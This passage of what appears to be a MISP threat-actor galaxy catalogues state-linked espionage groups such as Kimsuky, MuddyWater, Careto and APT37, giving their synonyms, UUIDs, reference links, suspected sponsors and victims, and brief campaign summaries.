- https://www.symantec.com/connect/blogs/tick-cyberespionage-group-zeros-japan - webarchive
- https://www.secureworks.jp/resources/rp-bronze-butler - webarchive
- https://researchcenter.paloaltonetworks.com/2017/07/unit42-tick-group-continues-attacks/ - webarchive
- http://blog.jpcert.or.jp/2017/08/detecting-datper-malware-from-proxy-logs.html - webarchive
- https://www.cfr.org/interactive/cyber-operations/bronze-butler - webarchive
- https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-butler-daserf-backdoor-now-using-steganography/ - webarchive
- https://attack.mitre.org/groups/G0060/ - webarchive
- https://www.secureworks.com/research/threat-profiles/bronze-butler - webarchive
- https://unit42.paloaltonetworks.com/atoms/stalkertaurus/ - webarchive
- https://twitter.com/iiyonite/status/1384431491485155331 - webarchive
- https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | China |
cfr-suspected-victims | ['Japan', 'China', 'Korea (Republic of)', 'Russian Federation'] |
cfr-target-category | ['Private sector'] |
cfr-type-of-incident | Espionage |
country | CN |
targeted-sector | ['Infrastructure', 'Industrial', 'Manufacturing', 'Diplomacy', 'News - Media', 'Political party', 'Engineering'] |
Related clusters
To see the related clusters, click here.
APT26
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular APT26.
Known Synonyms |
---|
BRONZE EXPRESS |
JerseyMikes |
TECHNETIUM |
TURBINE PANDA |
Internal MISP references
UUID c097471c-2405-4393-b6d7-afbcb5f0cd11
which can be used as unique global reference for APT26
in MISP communities and other software using the MISP galaxy
External references
- https://www.secureworks.com/research/threat-profiles/bronze-express - webarchive
- https://www.uscc.gov/sites/default/files/2022-02/Adam_Kozy_Testimony.pdf - webarchive
- https://www.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
country | CN |
Related clusters
To see the related clusters, click here.
SABRE PANDA
Internal MISP references
UUID 67adfa07-869f-4052-9d56-b88a51489902
which can be used as unique global reference for SABRE PANDA
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
country | CN |
BIG PANDA
Internal MISP references
UUID 06e89270-ca1b-4cd4-85f3-940d23c76766
which can be used as unique global reference for BIG PANDA
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
country | CN |
POISONUS PANDA
Internal MISP references
UUID 5bc7382d-ddc6-46d3-96f5-1dbdadbd601c
which can be used as unique global reference for POISONUS PANDA
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
country | CN |
Ghost Jackal
Internal MISP references
UUID 7ad01582-d6a7-4a40-a0ee-7727e268cd15
which can be used as unique global reference for Ghost Jackal
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
TEMP.Hermit
Internal MISP references
UUID 73c636ae-e55c-4167-bf40-315789698adb
which can be used as unique global reference for TEMP.Hermit
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
country | KP |
Mofang
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Mofang.
Known Synonyms |
---|
BRONZE WALKER |
Superman |
Internal MISP references
UUID 999f3008-2b2f-467d-ab4d-c5a2fd80b344
which can be used as unique global reference for Mofang
in MISP communities and other software using the MISP galaxy
External references
- https://blog.fox-it.com/2016/06/15/mofang-a-politically-motivated-information-stealing-adversary/ - webarchive
- https://www.cfr.org/interactive/cyber-operations/mofang - webarchive
- https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf - webarchive
- https://www.secureworks.com/research/threat-profiles/bronze-walker - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | China |
cfr-suspected-victims | ['Myanmar', 'Germany', 'Singapore', 'Canada', 'India', 'United States', 'South Korea'] |
cfr-target-category | ['Government', 'Private sector'] |
cfr-type-of-incident | Espionage |
country | CN |
CopyKittens
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular CopyKittens.
Known Synonyms |
---|
G0052 |
Slayer Kitten |
Internal MISP references
UUID 8cca9a1d-66e4-4bc4-ad49-95f759f4c1ae
which can be used as unique global reference for CopyKittens
in MISP communities and other software using the MISP galaxy
External references
- https://s3-eu-west-1.amazonaws.com/minervaresearchpublic/CopyKittens/CopyKittens.pdf - webarchive
- https://www.domaintools.com/resources/blog/case-study-hunting-campaign-indicators-on-privacy-protected-attack-infrastr - webarchive
- http://www.clearskysec.com/copykitten-jpost/ - webarchive
- http://www.clearskysec.com/tulip/ - webarchive
- https://www.cfr.org/interactive/cyber-operations/copykittens - webarchive
- https://www.clearskysec.com/wp-content/uploads/2017/07/Operation_Wilted_Tulip.pdf - webarchive
- https://attack.mitre.org/groups/G0052/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | Iran (Islamic Republic of) |
cfr-suspected-victims | ['Israel', 'Jordan', 'Saudi Arabia', 'Germany', 'United States'] |
cfr-target-category | ['Government', 'Private sector', 'Civil society'] |
cfr-type-of-incident | Espionage |
country | IR |
Related clusters
To see the related clusters, click here.
EvilPost
Internal MISP references
UUID 9035bfbf-a73f-4948-9df2-bd893e9cafef
which can be used as unique global reference for EvilPost
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
TEST PANDA
Internal MISP references
UUID cd6ac640-9ae9-4aa9-89cd-89b95be1a3ab
which can be used as unique global reference for TEST PANDA
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
country | CN |
Madi
Kaspersky Lab and Seculert worked together to sinkhole the Madi Command & Control (C&C) servers to monitor the campaign. Kaspersky Lab and Seculert identified more than 800 victims located in Iran, Israel and select countries across the globe connecting to the C&Cs over the past eight months. Statistics from the sinkhole revealed that the victims were primarily business people working on Iranian and Israeli critical infrastructure projects, Israeli financial institutions, Middle Eastern engineering students, and various government agencies communicating in the Middle East. Common applications and websites that were spied on include accounts on Gmail, Hotmail, Yahoo! Mail, ICQ, Skype, Google+, and Facebook. Surveillance is also performed over integrated ERP/CRM systems, business contracts, and financial management systems.
Internal MISP references
UUID d5dacda0-12c2-4e80-bdf2-1c5019ec40e2
which can be used as unique global reference for Madi
in MISP communities and other software using the MISP galaxy
External references
- https://securelist.com/the-madi-campaign-part-i-5/33693/ - webarchive
- https://securelist.com/the-madi-campaign-part-ii-53/33701/ - webarchive
- https://www.cfr.org/interactive/cyber-operations/madi - webarchive
- https://www.kaspersky.com/about/press-releases/2012_kaspersky-lab-and-seculert-announce--madi--a-newly-discovered-cyber-espionage-campaign-in-the-middle-east - webarchive
- https://threatpost.com/new-and-improved-madi-spyware-campaign-continues-072512/76849/ - webarchive
- https://web.archive.org/web/20120718173322/https://www.symantec.com/connect/blogs/madi-attacks-series-social-engineering-campaigns - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | Iran (Islamic Republic of) |
cfr-suspected-victims | ['Iran', 'Pakistan', 'Israel', 'United States'] |
cfr-target-category | ['Government', 'Private sector'] |
cfr-type-of-incident | Espionage |
country | IR |
targeted-sector | ['Infrastructure', 'Engineering', 'Government, Administration', 'Finance'] |
ELECTRIC PANDA
Internal MISP references
UUID 69059ec9-45c9-4961-a07e-6b2f2228f0ce
which can be used as unique global reference for ELECTRIC PANDA
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
country | CN |
APT4
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular APT4.
Known Synonyms |
---|
BRONZE EDISON |
MAVERICK PANDA |
PLA Navy |
SODIUM |
Salmon Typhoon |
Internal MISP references
UUID 8e28dbee-4e9e-4491-9a6c-ee9c9ec4b28b
which can be used as unique global reference for APT4
in MISP communities and other software using the MISP galaxy
External references
- https://www.alienvault.com/open-threat-exchange/blog/new-sykipot-developments - webarchive
- http://blog.trendmicro.com/trendlabs-security-intelligence/sykipot-now-targeting-us-civil-aviation-sector-information/ - webarchive
- https://www.sans.org/reading-room/whitepapers/malicious/detailed-analysis-sykipot-smartcard-proxy-variant-33919 - webarchive
- https://www.cfr.org/interactive/cyber-operations/sykipot - webarchive
- https://www.secureworks.com/research/threat-profiles/bronze-edison - webarchive
- https://www.mandiant.com/resources/insights/apt-groups - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | China |
cfr-suspected-victims | ['United States', 'United Kingdom', 'Hong Kong'] |
cfr-target-category | ['Private sector', 'Military'] |
cfr-type-of-incident | Espionage |
country | CN |
Kimsuky
This threat actor targets South Korean think tanks, industry, nuclear power operators, and the Ministry of Unification for espionage purposes.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Kimsuky.
Known Synonyms |
---|
APT43 |
Black Banshee |
Emerald Sleet |
G0086 |
Operation Stolen Pencil |
Springtail |
THALLIUM |
Thallium |
Velvet Chollima |
Internal MISP references
UUID bcaaad6f-0597-4b89-b69b-84a6be2b7bc3
which can be used as unique global reference for Kimsuky
in MISP communities and other software using the MISP galaxy
External references
- https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/ - webarchive
- https://www.cfr.org/interactive/cyber-operations/kimsuky - webarchive
- https://www.pwc.co.uk/issues/cyber-security-data-privacy/research/tracking-kimsuky-north-korea-based-cyber-espionage-group-part-2.html - webarchive
- https://youtu.be/hAsKp43AZmM?t=1027 - webarchive
- https://www.bloomberglaw.com/document/public/subdoc/X67FPNDOUBV9VOPS35A4864BFIU?imagename=1 - webarchive
- https://www.netscout.com/blog/asert/stolen-pencil-campaign-targets-academia - webarchive
- https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/ - webarchive
- https://attack.mitre.org/groups/G0086/ - webarchive
- https://us-cert.cisa.gov/ncas/alerts/aa20-301a - webarchive
- https://www.cybereason.com/blog/back-to-the-future-inside-the-kimsuky-kgh-spyware-suite - webarchive
- https://mandiant.widen.net/s/zvmfw5fnjs/apt43-report - webarchive
- https://asec.ahnlab.com/en/57873/ - webarchive
- https://asec.ahnlab.com/en/61082/ - webarchive
- https://www.rewterz.com/rewterz-news/rewterz-threat-alert-north-korean-apt-kimsuky-aka-black-banshee-active-iocs-29/ - webarchive
- https://www.sentinelone.com/labs/a-glimpse-into-future-scarcruft-campaigns-attackers-gather-strategic-intelligence-and-target-cybersecurity-professionals/ - webarchive
- https://www.bsi.bund.de/DE/Themen/Unternehmen-und-Organisationen/Cyber-Sicherheitslage/Analysen-und-Prognosen/Threat-Intelligence/Aktive_APT-Gruppen/aktive-apt-gruppen_node.html - webarchive
- https://ctoatncsc.substack.com/p/cto-at-ncsc-summary-week-ending-may-16b - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/springtail-kimsuky-backdoor-espionage - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | Korea (Democratic People's Republic of) |
cfr-suspected-victims | ['Ministry of Unification', 'Sejong Institute', 'Korea Institute for Defense Analyses', 'Germany'] |
cfr-target-category | ['Government', 'Private sector'] |
cfr-type-of-incident | Espionage |
country | KP |
targeted-sector | ['Research - Innovation', 'Energy', 'Defense', 'Diplomacy', 'Academia - University ', 'News - Media'] |
Related clusters
To see the related clusters, click here.
Snake Wine
While investigating some of the smaller name servers that APT28/Sofacy routinely use to host their infrastructure, Cylance discovered another prolonged campaign that appeared to exclusively target Japanese companies and individuals that began around August 2016. The later registration style was eerily close to previously registered APT28 domains, however, the malware used in the attacks did not seem to line up at all. During the course of our investigation, JPCERT published this analysis of one of the group’s backdoors. Cylance tracks this threat group internally as ‘Snake Wine’. The Snake Wine group has proven to be highly adaptable and has continued to adopt new tactics in order to establish footholds inside victim environments. The exclusive interest in Japanese government, education, and commerce will likely continue into the future as the group is just starting to build and utilize their existing current attack infrastructure.
Internal MISP references
UUID 7b6ba207-94de-4f94-bc7f-52cd0dafade5
which can be used as unique global reference for Snake Wine
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Careto
This threat actor targets governments, diplomatic missions, private companies in the energy sector, and academics for espionage purposes. The Mask is an advanced threat actor that has been involved in cyber-espionage operations since at least 2007. The name "Mask" comes from the Spanish slang word "Careto" ("Ugly Face" or “Mask”) which the authors included in some of the malware modules. More than 380 unique victims in 31 countries have been observed to date.What makes “The Mask” special is the complexity of the toolset used by the attackers. This includes an extremely sophisticated malware, a rootkit, a bootkit, 32-and 64-bit Windows versions, Mac OS X and Linux versions and possibly versions for Android and iPad/iPhone (Apple iOS).
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Careto.
Known Synonyms |
---|
Mask |
The Mask |
Ugly Face |
Internal MISP references
UUID 069ba781-b2d9-4403-9d9d-c599f5e0181d
which can be used as unique global reference for Careto
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | Spain |
cfr-suspected-victims | ['Morocco', 'France', 'Libya', 'Venezuela', 'Poland', 'Brazil', 'Spain', 'United States', 'South Africa', 'Tunisia', 'United Kingdom', 'Switzerland', 'Iran', 'Germany'] |
cfr-target-category | ['Government', 'Private sector'] |
cfr-type-of-incident | Espionage |
country | ES |
GIBBERISH PANDA
Internal MISP references
UUID b07cf296-7ab9-4b85-a07e-421607c212b0
which can be used as unique global reference for GIBBERISH PANDA
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
country | CN |
OnionDog
This threat actor targets the South Korean government, transportation, and energy sectors.
Internal MISP references
UUID 5898e11e-a023-464d-975c-b36fb1639e69
which can be used as unique global reference for OnionDog
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | Unknown |
cfr-suspected-victims | ['South Korea'] |
cfr-target-category | ['Government', 'Private sector'] |
cfr-type-of-incident | Espionage |
country | KP |
Clever Kitten
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Clever Kitten.
Known Synonyms |
---|
Group 41 |
Internal MISP references
UUID d56c99fa-4710-472c-81a6-41b7a84ea4be
which can be used as unique global reference for Clever Kitten
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
country | IR |
Related clusters
To see the related clusters, click here.
ANDROMEDA SPIDER
Internal MISP references
UUID e85ab78c-5e86-403c-b444-9cdcc167fb77
which can be used as unique global reference for ANDROMEDA SPIDER
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Cyber Caliphate Army
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Cyber Caliphate Army.
Known Synonyms |
---|
CCA |
CyberCaliphate |
Islamic State Hacking Division |
UUC |
United Cyber Caliphate |
Internal MISP references
UUID 76f6ad4e-2ff3-4ccb-b81d-18162f290af0
which can be used as unique global reference for Cyber Caliphate Army
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
MAGNETIC SPIDER
Internal MISP references
UUID 430ba885-cd24-492e-804c-815176ed9b1e
which can be used as unique global reference for MAGNETIC SPIDER
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
country | RU |
SINGING SPIDER
Internal MISP references
UUID 769bf551-ff39-4f84-b7f2-654a28df1e50
which can be used as unique global reference for SINGING SPIDER
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Cyber fighters of Izz Ad-Din Al Qassam
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Cyber fighters of Izz Ad-Din Al Qassam.
Known Synonyms |
---|
Fraternal Jackal |
Internal MISP references
UUID 22c2b363-5d8f-4b04-96db-1b6cf4d7e8db
which can be used as unique global reference for Cyber fighters of Izz Ad-Din Al Qassam
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
country | IR |
APT6
The FBI issued a rare bulletin admitting that a group named Advanced Persistent Threat 6 (APT6) hacked into US government computer systems as far back as 2011 and for years stole sensitive data. The FBI alert was issued in February and went largely unnoticed. Nearly a month later, security experts are now shining a bright light on the alert and the mysterious group behind the attack. “This is a rare alert and a little late, but one that is welcomed by all security vendors as it offers a chance to mitigate their customers and also collaborate further in what appears to be an ongoing FBI investigation,” said Deepen Desai, director of security research at the security firm Zscaler in an email to Threatpost. Details regarding the actual attack and what government systems were infected are scant. Government officials said they knew the initial attack occurred in 2011, but are unaware of who specifically is behind the attacks. “Given the nature of malware payload involved and the duration of this compromise being unnoticed – the scope of lateral movement inside the compromised network is very high possibly exposing all the critical systems,”Deepen said.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular APT6.
Known Synonyms |
---|
1.php Group |
Internal MISP references
UUID 1a2592a3-eab7-417c-bf2d-9c0558c2b3e7
which can be used as unique global reference for APT6
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
country | CN |
AridViper
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular AridViper.
Known Synonyms |
---|
APT-C-23 |
Arid Viper |
DESERTVARNISH |
Desert Falcon |
Renegade Jackal |
UNC718 |
Internal MISP references
UUID 0cfff0f4-868c-40a1-b9b4-0d153c0b33b6
which can be used as unique global reference for AridViper
in MISP communities and other software using the MISP galaxy
External references
- http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-operation-arid-viper.pdf - webarchive
- http://securityaffairs.co/wordpress/33785/cyber-crime/arid-viper-israel-sex-video.html - webarchive
- https://securelist.com/blog/research/68817/the-desert-falcons-targeted-attacks/ - webarchive
- https://blog.lookout.com/blog/2017/02/16/viperrat-mobile-apt/ - webarchive
- https://securelist.com/blog/incidents/77562/breaking-the-weakest-link-of-the-strongest-chain/ - webarchive
- https://www.proofpoint.com/us/threat-insight/post/Operation-Arid-Viper-Slithers-Back-Into-View - webarchive
- http://blog.talosintelligence.com/2017/06/palestine-delphi.html - webarchive
- https://www.threatconnect.com/blog/kasperagent-malware-campaign/ - webarchive
- https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/sexually-explicit-material-used-as-lures-in-cyber-attacks?linkId=12425812 - webarchive
- https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08064309/The-Desert-Falcons-targeted-attacks.pdf - webarchive
- https://services.google.com/fh/files/misc/tool-of-first-resort-israel-hamas-war-cyber.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
cfr-suspected-state-sponsor | Palestine |
cfr-suspected-victims | ['United States', 'Israel', 'Palestine', 'Middle East', 'Europe'] |
cfr-target-category | ['Government', 'Defense', 'Energy', 'Finance', 'Education', 'High-Tech', 'Telecoms', 'Transportation', 'Media', 'NGOs', 'Civil Society', 'Legal', 'Military'] |
cfr-type-of-incident | Espionage |
country | PS |
DEXTOROUS SPIDER
Internal MISP references
UUID 445c7b62-028b-455e-9d65-74899b7006a4
which can be used as unique global reference for DEXTOROUS SPIDER
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Unit 8200
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Unit 8200.
Known Synonyms |
---|
Duqu Group |
Internal MISP references
UUID e9a6cbd7-ca27-4894-ae20-9d11c06fdc02
which can be used as unique global reference for Unit 8200
in MISP communities and other software using the MISP galaxy
External references
- https://securelist.com/blog/research/70504/the-mystery-of-duqu-2-0-a-sophisticated-cyberespionage-actor-returns/ - webarchive
- https://archive.org/details/Stuxnet - webarchive
- https://www.cfr.org/interactive/cyber-operations/duqu - webarchive
- https://www.cfr.org/interactive/cyber-operations/duqu-20 - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | Israel |
cfr-suspected-victims | ['Iran', 'Sudan'] |
cfr-target-category | ['Military', 'Government', 'Private sector'] |
cfr-type-of-incident | Espionage |
country | IL |
White Bear
As a part of our Kaspersky APT Intelligence Reporting subscription, customers received an update in mid-February 2017 on some interesting APT activity that we called WhiteBear. Much of the contents of that report are reproduced here. WhiteBear is a parallel project or second stage of the Skipper Turla cluster of activity documented in another private intelligence report “Skipper Turla – the White Atlas framework” from mid-2016. Like previous Turla activity, WhiteBear leverages compromised websites and hijacked satellite connections for command and control (C2) infrastructure. As a matter of fact, WhiteBear infrastructure has overlap with other Turla campaigns, like those deploying Kopiluwak, as documented in “KopiLuwak – A New JavaScript Payload from Turla” in December 2016. WhiteBear infected systems maintained a dropper (which was typically signed) as well as a complex malicious platform which was always preceded by WhiteAtlas module deployment attempts. However, despite the similarities to previous Turla campaigns, we believe that WhiteBear is a distinct project with a separate focus. We note that this observation of delineated target focus, tooling, and project context is an interesting one that also can be repeated across broadly labeled Turla and Sofacy activity. From February to September 2016, WhiteBear activity was narrowly focused on embassies and consular operations around the world. All of these early WhiteBear targets were related to embassies and diplomatic/foreign affair organizations. Continued WhiteBear activity later shifted to include defense-related organizations into June 2017. When compared to WhiteAtlas infections, WhiteBear deployments are relatively rare and represent a departure from the broader Skipper Turla target set. Additionally, a comparison of the WhiteAtlas framework to WhiteBear components indicates that the malware is the product of separate development efforts. WhiteBear infections appear to be preceded by a condensed spearphishing dropper, lack Firefox extension installer payloads, and contain several new components signed with a new code signing digital certificate, unlike WhiteAtlas incidents and modules.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular White Bear.
Known Synonyms |
---|
Skipper Turla |
Internal MISP references
UUID dc6c6cbc-9dc6-4ace-a2d2-fadefe45cce6
which can be used as unique global reference for White Bear
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | Russian Federation |
cfr-suspected-victims | ['United States', 'South Korea', 'United Kingdom', 'Uzbekistan'] |
cfr-target-category | ['Government', 'Private sector'] |
cfr-type-of-incident | Espionage |
country | RU |
PALE PANDA
Internal MISP references
UUID 43992f81-fd29-4228-94e0-c3aa3e65aab7
which can be used as unique global reference for PALE PANDA
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
country | CN |
Mana Team
Internal MISP references
UUID 110792e8-38d2-4df2-9ea3-08b60321e994
which can be used as unique global reference for Mana Team
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
country | CN |
Sowbug
Sowbug has been conducting highly targeted cyber attacks against organizations in South America and Southeast Asia and appears to be heavily focused on foreign policy institutions and diplomatic targets. Sowbug has been seen mounting classic espionage attacks by stealing documents from the organizations it infiltrates.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Sowbug.
Known Synonyms |
---|
G0054 |
Internal MISP references
UUID 1ca3b039-404e-4132-88c2-4e41235cd2f5
which can be used as unique global reference for Sowbug
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | Unknown |
cfr-suspected-victims | ['Argentina', 'Ecuador', 'Brazil', 'Brunei', 'Peru', 'Malaysia'] |
cfr-target-category | ['Government'] |
cfr-type-of-incident | Espionage |
Related clusters
To see the related clusters, click here.
MuddyWater
The MuddyWater attacks are primarily against Middle Eastern nations. However, we have also observed attacks against surrounding nations and beyond, including targets in India and the USA. MuddyWater attacks are characterized by the use of a slowly evolving PowerShell-based first stage backdoor we call “POWERSTATS”. Despite broad scrutiny and reports on MuddyWater attacks, the activity continues with only incremental changes to the tools and techniques.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular MuddyWater.
Known Synonyms |
---|
ATK51 |
Boggy Serpens |
COBALT ULSTER |
Earth Vetala |
G0069 |
MERCURY |
Mango Sandstorm |
Seedworm |
Static Kitten |
TA450 |
TEMP.Zagros |
Internal MISP references
UUID a29af069-03c3-4534-b78b-7d1a77ea085b
which can be used as unique global reference for MuddyWater
in MISP communities and other software using the MISP galaxy
External references
- https://unit42.paloaltonetworks.com/unit42-muddying-the-water-targeted-attacks-in-the-middle-east/ - webarchive
- https://www.cfr.org/interactive/cyber-operations/muddywater - webarchive
- https://www.fireeye.com/blog/threat-research/2018/03/iranian-threat-group-updates-ttps-in-spear-phishing-campaign.html - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/campaign-possibly-connected-muddywater-surfaces-middle-east-central-asia/ - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/another-potential-muddywater-campaign-uses-powershell-based-prb-backdoor/ - webarchive
- https://securelist.com/muddywater/88059/ - webarchive
- https://www.symantec.com/blogs/threat-intelligence/seedworm-espionage-group - webarchive
- https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf - webarchive
- https://www.clearskysec.com/muddywater-targets-kurdish-groups-turkish-orgs/ - webarchive
- https://blog.talosintelligence.com/2019/05/recent-muddywater-associated-blackwater.html - webarchive
- https://www.zdnet.com/article/new-leaks-of-iranian-cyber-espionage-operations-hit-telegram-and-the-dark-web/ - webarchive
- https://attack.mitre.org/groups/G0069/ - webarchive
- http://www.secureworks.com/research/threat-profiles/cobalt-ulster - webarchive
- https://unit42.paloaltonetworks.com/atoms/boggyserpens/ - webarchive
- https://www.sentinelone.com/blog/the-new-frontline-of-geopolitics-understanding-the-rise-of-state-sponsored-cyber-attacks/ - webarchive
- https://www.trendmicro.com/en_us/research/21/c/earth-vetala---muddywater-continues-to-target-organizations-in-t.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | Iran (Islamic Republic of) |
cfr-suspected-victims | ['Saudi Arabia', 'Georgia', 'Turkey', 'Iraq', 'Israel', 'India', 'United Arab Emirates', 'Pakistan', 'United States'] |
cfr-target-category | ['Government'] |
cfr-type-of-incident | Espionage |
country | IR |
Related clusters
To see the related clusters, click here.
MoneyTaker
In less than two years, this group has conducted over 20 successful attacks on financial institutions and legal firms in the USA, UK and Russia. The group has primarily been targeting card processing systems, including the AWS CBR (Russian Interbank System) and purportedly SWIFT (US). Given the wide usage of STAR in LATAM, financial institutions in LATAM could have particular exposure to a potential interest from the MoneyTaker group.
Internal MISP references
UUID 7d78ec00-dfdc-4a80-a4da-63f1ae63bd7f
which can be used as unique global reference for MoneyTaker
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Dark Caracal
Lookout and Electronic Frontier Foundation (EFF) have discovered Dark Caracal, a persistent and prolific actor, who at the time of writing is believed to be administered out of a building belonging to the Lebanese General Security Directorate in Beirut. At present, we have knowledge of hundreds of gigabytes of exfiltrated data, in 21+ countries, across thousands of victims. Stolen data includes enterprise intellectual property and personally identifiable information.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Dark Caracal.
Known Synonyms |
---|
G0070 |
Internal MISP references
UUID 3d449c83-4426-431a-b06a-cb4f8a0fca94
which can be used as unique global reference for Dark Caracal
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
country | LB |
Nexus Zeta
Nexus Zeta is no stranger when it comes to implementing SOAP related exploits. The threat actor has already been observed in implementing two other known SOAP related exploits, CVE-2014–8361 and CVE-2017–17215 in his Satori botnet project. A third SOAP exploit, TR-069 bug has also been observed previously in IoT botnets. This makes EDB 38722 the fourth SOAP related exploit which is discovered in the wild by IoT botnets.
Internal MISP references
UUID 8c21ce09-33c3-412c-bb55-323765e89a60
which can be used as unique global reference for Nexus Zeta
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
APT37
APT37 has likely been active since at least 2012 and focuses on targeting the public and private sectors primarily in South Korea. In 2017, APT37 expanded its targeting beyond the Korean peninsula to include Japan, Vietnam and the Middle East, and to a wider range of industry verticals, including chemicals, electronics, manufacturing, aerospace, automotive and healthcare entities
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular APT37.
Known Synonyms |
---|
APT 37 |
ATK4 |
G0067 |
Group 123 |
Group123 |
InkySquid |
Moldy Pisces |
Operation Daybreak |
Operation Erebus |
Reaper |
Reaper Group |
Red Eyes |
Ricochet Chollima |
ScarCruft |
Venus 121 |
Internal MISP references
UUID 50cd027f-df14-40b2-aa22-bf5de5061163
which can be used as unique global reference for APT37
in MISP communities and other software using the MISP galaxy
External references
- https://www.volexity.com/blog/2021/08/17/north-korean-apt-inkysquid-infects-victims-using-browser-exploits/ - webarchive
- https://www.fireeye.com/blog/threat-research/2018/02/apt37-overlooked-north-korean-actor.html - webarchive
- https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf - webarchive
- http://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html - webarchive
- https://twitter.com/mstoned7/status/966126706107953152 - webarchive
- https://www.cfr.org/interactive/cyber-operations/apt-37 - webarchive
